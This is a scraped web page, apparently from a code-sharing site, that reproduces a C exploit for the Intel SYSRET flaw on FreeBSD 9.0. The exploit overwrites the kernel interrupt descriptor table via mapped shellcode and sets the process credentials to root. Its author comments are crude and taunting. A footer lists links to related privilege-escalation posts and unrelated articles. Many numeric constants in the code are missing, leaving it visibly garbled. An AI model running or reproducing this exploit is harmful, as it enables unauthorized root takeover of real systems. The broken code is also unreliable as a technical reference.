FreeBSD Intel SYSRET Kernel Privilege Escalation Exploit
/*
* FreeBSD 9.0 Intel SYSRET Kernel Privilege Escalation exploit
* Author by CurcolHekerLink
*
* This exploit based on open source project, I can make it open source too. Right?
*
* If you blaming me for open sourcing this exploit, you can fuck your mom. Free of charge :)
*
* Credits to KEPEDEAN Corp, Barisan Sakit Hati, ora iso sepaying meneh hekerlink,
* Kismin perogeremer cyber team, petboylittledick, 1337 Curhat Crew and others at #MamaDedehEliteCurhatTeam
* if you would like next private exploit leakage, just mention @MamahhDedeh
*
* Some people may feel harmed when we release this exploit :))
*
* p.s: Met idul Adha ya besok, saatnya potong leher dewa lo... eh maksudnya potong Sapisisasi :))
*
*/ #include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <unistd.h>
#include <string.h>
#include <sys/mman.h>
#include <machine/cpufunc.h>
#define _WANT_UCRED
#include <sys/proc.h>
#include <machine/segments.h>
#include <sys/param.h>
#include <sys/linker.h>
#define TRIGGERSIZE 20
#define BOUNCESIZE 18 uintptr_t Xdivp, Xdbgp, Xbptp, Xoflp, Xbndp, Xillp, Xdnap, Xfpusegmp, Xtssp, Xmissingp, Xstkp, Xprotp, Xpagep, Xfpup, Xalignp, Xmchkp, Xxmmp; struct gate_descriptor * sidt()
{
struct region_descriptor idt;
asm ("sidt %0": "=m"(idt));
return (struct gate_descriptor*)idt.rd_base;
} u_long matchsym(char *symname)
{
struct kld_sym_lookup ksym;
ksym.version = sizeof (ksym);
ksym.symname = symname;
if (kldsym(, KLDSYM_LOOKUP, &ksym) < ) {
perror("kldsym");
exit();
}
return ksym.symvalue;
} void setidt(struct gate_descriptor *idt, int idx, uintptr_t func, int typ, int dpl, int ist)
{
struct gate_descriptor *ip;
ip = idt + idx;
ip->gd_looffset = func;
ip->gd_selector = GSEL(GCODE_SEL, SEL_KPL);
ip->gd_ist = ist;
ip->gd_xx = ;
ip->gd_type = typ;
ip->gd_dpl = dpl;
ip->gd_p = ;
ip->gd_hioffset = func>>;
} void payload()
{
printf("[+] Woohoo!!!\n");
exit();
} void resetidt()
{
struct thread *td;
struct ucred *cred;
struct gate_descriptor *idt = sidt();
setidt(idt, IDT_DE, Xdivp, SDT_SYSIGT, SEL_KPL, );
setidt(idt, IDT_DB, Xdbgp, SDT_SYSIGT, SEL_KPL, );
setidt(idt, IDT_BP, Xbptp, SDT_SYSIGT, SEL_KPL, );
setidt(idt, IDT_OF, Xoflp, SDT_SYSIGT, SEL_KPL, );
setidt(idt, IDT_BR, Xbndp, SDT_SYSIGT, SEL_KPL, );
setidt(idt, IDT_UD, Xillp, SDT_SYSIGT, SEL_KPL, );
setidt(idt, IDT_NM, Xdnap, SDT_SYSIGT, SEL_KPL, );
setidt(idt, IDT_FPUGP, Xfpusegmp, SDT_SYSIGT, SEL_KPL, );
setidt(idt, IDT_TS, Xtssp, SDT_SYSIGT, SEL_KPL, );
setidt(idt, IDT_NP, Xmissingp, SDT_SYSIGT, SEL_KPL, );
setidt(idt, IDT_SS, Xstkp, SDT_SYSIGT, SEL_KPL, );
setidt(idt, IDT_GP, Xprotp, SDT_SYSIGT, SEL_KPL, );
setidt(idt, IDT_PF, Xpagep, SDT_SYSIGT, SEL_KPL, );
setidt(idt, IDT_MF, Xfpup, SDT_SYSIGT, SEL_KPL, );
setidt(idt, IDT_AC, Xalignp, SDT_SYSIGT, SEL_KPL, );
setidt(idt, IDT_MC, Xmchkp, SDT_SYSIGT, SEL_KPL, );
setidt(idt, IDT_XF, Xxmmp, SDT_SYSIGT, SEL_KPL, ); asm ("mov %%gs:0, %0" : "=r"(td)); cred = td->td_proc->p_ucred;
cred->cr_uid = cred->cr_ruid = cred->cr_rgid = ;
cred->cr_groups[] = ; asm ("swapgs; sysretq;" :: "c"(payload));
} void resolving()
{
Xdivp = (uintptr_t)matchsym("Xdiv");
Xdbgp = (uintptr_t)matchsym("Xdbg");
Xbptp = (uintptr_t)matchsym("Xbpt");
Xoflp = (uintptr_t)matchsym("Xofl");
Xbndp = (uintptr_t)matchsym("Xbnd");
Xillp = (uintptr_t)matchsym("Xill");
Xdnap = (uintptr_t)matchsym("Xdna");
Xfpusegmp = (uintptr_t)matchsym("Xfpusegm");
Xtssp = (uintptr_t)matchsym("Xtss");
Xmissingp = (uintptr_t)matchsym("Xmissing");
Xstkp = (uintptr_t)matchsym("Xstk");
Xprotp = (uintptr_t)matchsym("Xprot");
Xpagep = (uintptr_t)matchsym("Xpage");
Xfpup = (uintptr_t)matchsym("Xfpu");
Xalignp = (uintptr_t)matchsym("Xalign");
Xmchkp = (uintptr_t)matchsym("Xmchk");
Xxmmp = (uintptr_t)matchsym("Xxmm");
} void trigger()
{
printf("[+] Crotz...\n");
uint64_t pagesize = getpagesize();
uint8_t * mappedarea = (uint8_t*)((1ULL << ) - pagesize);
mappedarea = mmap(mappedarea, pagesize, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_FIXED | MAP_ANON | MAP_PRIVATE, -, );
if (mappedarea == MAP_FAILED) {
perror("mmap (trigger)");
exit();
} char triggerpayload[] =
"\xb8\x18\x00\x00\x00"
"\x48\x89\xe3"
"\x48\xbc\xef\xbe\xad\xde\xef\xbe\xad\xde"
"\x0f\x05"; uint8_t * offset_addr = mappedarea + pagesize - TRIGGERSIZE;
memcpy(offset_addr, triggerpayload, TRIGGERSIZE); *(uint64_t*)(offset_addr + ) = (uint64_t)(((uint8_t*)&sidt()[]) + * );
printf("[+] Crotz...\n");
char bouncepayload[] =
"\x0f\x01\xf8"
"\x48\x89\xdc"
"\x48\xb8\xef\xbe\xad\xde\xef\xbe\xad\xde"
"\xff\xe0"; uint8_t * bouncer = (uint8_t*)(0x900000000 | (Xpagep & 0xFFFFFFFF));
size_t bouncer_allocsize = pagesize;
if ((uint8_t*)((uint64_t)bouncer & ~(pagesize-)) + pagesize < bouncer + BOUNCESIZE)
bouncer_allocsize += pagesize;
if (mmap((void*)((uint64_t)bouncer & ~(pagesize-)), bouncer_allocsize, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_FIXED | MAP_ANON | MAP_PRIVATE, -, ) == MAP_FAILED)
{
perror("mmap (bouncer)");
exit();
}
memcpy(bouncer, bouncepayload, BOUNCESIZE);
*(uint64_t*)(bouncer + ) = (uint64_t)resetidt;
((void (*)())offset_addr)();
} int main(int argc, char *argv[])
{
printf("[+] SYSRET FUCKUP!!\n");
printf("[+] Start Engine...\n");
resolving();
printf("[+] Crotz...\n");
trigger();
return ;
}
FreeBSD Intel SYSRET Kernel Privilege Escalation Exploit的更多相关文章
- Android linux kernel privilege escalation vulnerability and exploit (CVE-2014-4322)
In this blog post we'll go over a Linux kernel privilege escalation vulnerability I discovered which ...
- OSCP Learning Notes - Privilege Escalation
Privilege Escalation Download the Basic-pentesting vitualmation from the following website: https:// ...
- karottc A Simple linux-virus Analysis、Linux Kernel <= 2.6.37 - Local Privilege Escalation、CVE-2010-4258、CVE-2010-3849、CVE-2010-3850
catalog . 程序功能概述 . 感染文件 . 前置知识 . 获取ROOT权限: Linux Kernel <= - Local Privilege Escalation 1. 程序功能概述 ...
- CVE-2014-4014 Linux Kernel Local Privilege Escalation PoC
/** * CVE-2014-4014 Linux Kernel Local Privilege Escalation PoC * * Vitaly Nikolenko * http://ha ...
- Basic Linux Privilege Escalation
(Linux) privilege escalation is all about: Collect - Enumeration, more enumeration and some more enu ...
- Linux/Unix System Level Attack、Privilege Escalation(undone)
目录 . How To Start A System Level Attack . Remote Access Attack . Local Access Attack . After Get Roo ...
- [EXP]Memu Play 6.0.7 - Privilege Escalation
# Exploit Title: Memu Play - Privilege Escalation (PoC) # Date: // # Author: Alejandra Sánchez # Ven ...
- [EXP]Microsoft Windows - DfMarshal Unsafe Unmarshaling Privilege Escalation
Windows: DfMarshal Unsafe Unmarshaling Elevation of Privilege (Master) Platform: Windows (not tested ...
- Linux 2.6.x fs/pipe.c local kernel root(kit?) exploit (x86)
/****************************************************************************** * .:: Impel Down ::. ...
随机推荐
- 中石油-高精度阶乘-java
问题 F: [高精度]高精度阶乘 时间限制: 1 Sec 内存限制: 64 MB提交: 49 解决: 13[提交][状态][讨论版] 题目描述 <魔法宝典>对于修罗王是如此重要,是因为 ...
- Ant基本使用指南
近期碰到了其他人在讨论这个ant,已经很多人在使用,故对他进行收集资料进了解,以便方便去使用.同时,在学习struts+spring+hibernate,尤其是Appfuse的过程中大量涉及到ant的 ...
- 无线ap和路由器wifi热点怎么区分和区别
转自:http://blog.sina.com.cn/s/blog_5a6efa330101yrzh.html 有的人发现无线ap和无线路由器都可以实现无线上网,于是到无线市场买了个相当便宜的无线ap ...
- oracle 10g 学习之数据进行增删改查、数据库事务、约束(8)
目标 通过本章学习,您将可以: l 使用 DML 语句 l 向表中插入数据 l 更新表中数据 l 从表中删除数据 l 控制事务 l 描述约束 l 创建和维护约束 数据控制语言 l ...
- 使用asp.net从零开始制作设计网站---转载
首先感谢提供此教程的朋友,可以给大家学习的机会,很有用,留着好好学.如下正文: 1. 申请域名 2. 购买空间 3. 备案 4. 使用photoshop完成设计与切图 5. 使用dreamweave ...
- 2-SAT问题及其算法
原文地址:http://www.cppblog.com/MatoNo1/archive/2011/07/13/150766.aspx [2-SAT问题]现有一个由N个布尔值组成的序列A,给出一些限制关 ...
- FPGA学习
(一)Verilog HDL语法 一.模块 1.定义:一个电路模块/一种逻辑功能: 2.命名规则:只能是字母,数字,"$",或者'_',且开头必须是字母或者"_" ...
- 中文在unicode中的编码范围
以前写过一篇贴子是写中文在unicode中的编码范围 unicode中文范围,但写的不是很详细,今天再次研究了下unicode,并给出详细的unicode取值范围. 本次研究的unicode对象是un ...
- 自定义ContentProvider的一些细节探究
1. 适用范围 对于什么情况下才会用到自定义的ContentProvider,官方文档的Dev Guide是这样描述的: 如果你想要提供以下的一种或几种特性的时候你才需要构造一个ContentPr ...
- eclipse中编译时enum出现cannot be resolved to a type错误
eclipse中编译时enum出现cannot be resolved to a type错误 通常是因为eclise使用的jdk版本的问题...默认是使用的是jdk1.5 应该去选择成jdk1.6或 ...